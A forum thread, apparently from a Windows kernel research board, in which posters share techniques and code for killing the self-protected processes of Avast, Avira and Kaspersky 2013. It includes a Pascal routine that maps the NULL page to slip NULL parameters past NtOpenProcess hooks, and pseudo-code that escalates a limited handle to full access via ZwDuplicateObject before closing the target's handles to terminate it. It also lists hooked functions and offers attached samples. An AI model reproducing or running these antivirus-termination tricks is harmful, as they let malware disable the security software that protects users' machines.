[R00tKit]

send pm to 0x16/7ton

[0x16/7ton]

I want share about some interesting bypassing SP method in avast and avira ,for x86 arch model.
In both antivirus SP based on hooking in SSDT NtOpenProcess function,to prevent terminating protecting process.
For example avast just return STATUS_ACCESS_DENIED,or avira changing access mask for opening process handle (read/query only) when we try open protected process
In hook handler function on start they all check input parameteres for NtOpenProcess function.
Here defination of it :

Code: Select all

NTSTATUS NtOpenProcess
(
  _Out_     PHANDLE ProcessHandle,
  _In_      ACCESS_MASK DesiredAccess,
  _In_      POBJECT_ATTRIBUTES ObjectAttributes,
  _In_opt_  PCLIENT_ID ClientId
)

So i am use some trick to fool AV:
ProcessHandle and ObjectAttributes can be a NULL pointer ;) Yes i mean that windows allowed that parameters with NULL and not failed if we allocate memory with READ/WRITE access in NULL region.
In result AV checking not execute(they think incoming parameters not correct),and only passing control flow to original function.
Ok here demo video :
http://www.sendspace.com/file/bibrzz
Have Fuuun and also my regards ;)

[EP_X0FF]

Old good trick with null pointer. Did not think that this is still going to work on someone. Won't work in Win8.

If anyone interested, here is old pascal source. Only avira detect+kill code missing.

Code: Select all

var
  Status: NTSTATUS;
  addr: pointer;
  size: ULONG;
  cid: CLIENT_ID;
  attr: OBJECT_ATTRIBUTES;
begin
  addr := pointer($1);
  size := $1000;

  Status := ZwAllocateVirtualMemory(NtCurrentProcess, @addr, 0, @size, MEM_RESERVE or MEM_COMMIT, PAGE_READWRITE);
  if (Status = STATUS_SUCCESS) then
  begin

    InitializeObjectAttributes(@attr, nil, 0, 0);
    cid.UniqueProcess := GetCurrentProcessId();

    Status := ZwOpenProcess(nil, PROCESS_ALL_ACCESS, nil, @cid);
    if (Status = STATUS_SUCCESS) then
    begin
      ZwClose(PHANDLE(nil)^);
      MessageBoxW(0, 'Success', '', MB_OK);
    end;
    ZwFreeVirtualMemory(NtCurrentProcess, @addr, @size, MEM_RELEASE);
  end else
    MessageBoxW(0, 'ZWAVM fail', '', MB_OK);

List of Avira 13 hooks.

NtClose
NtCreateKey
NtCreateSection
NtCreateThread,
NtDeleteKey
NtDeleteValueKey
NtDuplicateObject
NtLoadKey
NtOpenProcess
NtOpenThread
NtQueryValueKey
NtReplaceKey
NtRequestWaitReplyPort
NtRestoreKey
NtSetContextThread
NtSetSecurityObject
NtSetValueKey
NtSystemDebugControl
NtTerminateProcess

Pretty banal, multiple ways to terminate using valid full access process handle.

[rinn]

Hello.

Bumping the old thread to add: trick with using NULL VA allocated memory should not be working after MS13-031 :)

Best Regards,
-rin

[EP_X0FF]

Bumping the old thread to add: trick with using NULL VA allocated memory should not be working after MS13-031 :)

It still will be working in XP, as no one interested/motivated in XP redesign.

[rinn]

Bumping the old thread to add: trick with using NULL VA allocated memory should not be working after MS13-031 :)

It still will be working in XP, as no one interested/motivated in XP redesign.

Hi.

Yes, true for 32 bit versions of Windows, because of NTVDM.

Best Regards,
-rin

[0x16/7ton]

Yeap patch :)
this man @Ivanlef0u (in twitter) found this:
on Windows7 x86 still can be mapped NULL page because gloval var nt!MmLowVaMapping is 1
also we can control this global parameter:
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management
EnableLowVaAccess
And this:
Image File Execution Options [EnableLowVaAccess]
Hehe and in the end it is not a problem using another well known method..for example transfer function parameters with set PAGE_GUARD memory attribute

[EP_X0FF]

HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management
EnableLowVaAccess
And this:
Image File Execution Options [EnableLowVaAccess]

Without admin rights you cannot change it.

Hehe and in the end it is not a problem using another well known method..for example transfer function parameters with set PAGE_GUARD memory attribute

Does it still works with something? I know Comodo was vulnerable to this.

[0x16/7ton]

I am not try on other vendor,but i think some of them will be fooled.
Anyway on x64 system HIPS it is totally weird shit and for us not needed to use any tricks :D

[0x16/7ton]

pikA kernelMode :)
Today i am gonna show another simple trick to fool AV.
Ok victim == kaspersky 2013 with all last update (yeap really,i have licensed version :D)

So as we already discussed,SP of all AV Is based on the prohibition of opening protected process.
But of course to provide some compatibility they allowed opening theirs process with some limited access.
Ok example:
kaspersky allowed to open his main (avp.exe) process with PROCESS_QUERY_LIMITED_INFORMATION access mask.
And here simple trick:
we use ZwDuplicateObject function to duplicate handle of opened process,but with other ACCESS_MASK (DesiredAccess)

Code: Select all

NTSTATUS ZwDuplicateObject(
  _In_       HANDLE SourceProcessHandle,
  _In_       HANDLE SourceHandle,
  _In_opt_   HANDLE TargetProcessHandle,
  _Out_opt_  PHANDLE TargetHandle,
  _In_       ACCESS_MASK DesiredAccess,
  _In_       ULONG HandleAttributes,
  _In_       ULONG Options
);

Simple pseudo code:

Code: Select all

//opening avp.exe
hProcess=OpenProcess( PROCESS_QUERY_LIMITED_INFORMATION);
//duplicate new handle with full access
ZwDuplicateObject((HANDLE)CURRENT_PROCESS,hProcess,(HANDLE)CURRENT_PROCESS,&new_handle,PROCESS_ALL_ACCESS,DUPLICATE_SAME_ATTRIBUTES);

In result we have full access process handle..So what we can do?For example i am using this well known method to force the process to be terminating:

Code: Select all

for (i = 0 ; i <= 4096 ; i++)
{
     HANDLE copy_handle;
     DuplicateHandle( new_handle, (HANDLE)i , NULL, &copy_handle, 0, FALSE, DUPLICATE_CLOSE_SOURCE)
}

I am can't test now with other av and on other Windows versions(i am testing on VistaSP1 x86)
Also i am did not make video demo,but i am attach test sample,so if you want try it -you are welcome:)
notes:
-in attached sample terminating only GUI process avp.exe
-to terminate service i am think we need admin rigths and impersonating thread with system SID token(S-1-5-18),otherwise ZwDuplicateObject return STATUS_ACCESS_DENIED